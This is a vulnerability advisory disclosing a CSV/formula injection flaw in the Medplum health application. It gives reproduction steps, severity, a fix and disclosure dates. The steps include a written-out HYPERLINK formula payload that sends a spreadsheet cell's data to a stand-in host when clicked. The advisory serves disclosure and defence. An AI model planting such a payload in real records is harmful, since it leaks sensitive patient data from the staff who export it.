CSV/Formula Injection in Medplum

CSV/Formula Injection in Medplum

Vulnerability Reports
March 6, 2024
Profile Icon

Jason Franscisco

CVE Number


Loginsoft ID



The application “Medplum” is affected by CSV/formula injection vulnerability, posing a risk of exposing sensitive data. An attacker could inject a malicious payload into input fields. Subsequently, when a high-privileged user exports the data as CSV, the injected payload may be executed.


CWE-1236: Improper Neutralization of Formula Elements in a CSV File

Affected Versions

< v3.0.8


CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8(Medium)

Steps To Reproduce
  1. Create a new patient with gender field having the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me") `.

  1. Now Export patient data in CSV format.
  1. Open the CSV file, press the Ctrl key, and left click on the cell with the value Click Me.
  1. Doing this exposes the sensitive data of the user located in cell F3.

Exposure of sensitive data.


Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.



Discovered Date

15 February 2024

Reported Date

19 February 2024

Patched Date

03 March 2024


Saharsh Agrawal

Explore Cybersecurity Platforms

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse varius enim in eros.

Discover Lovi

Sign up to our Newsletter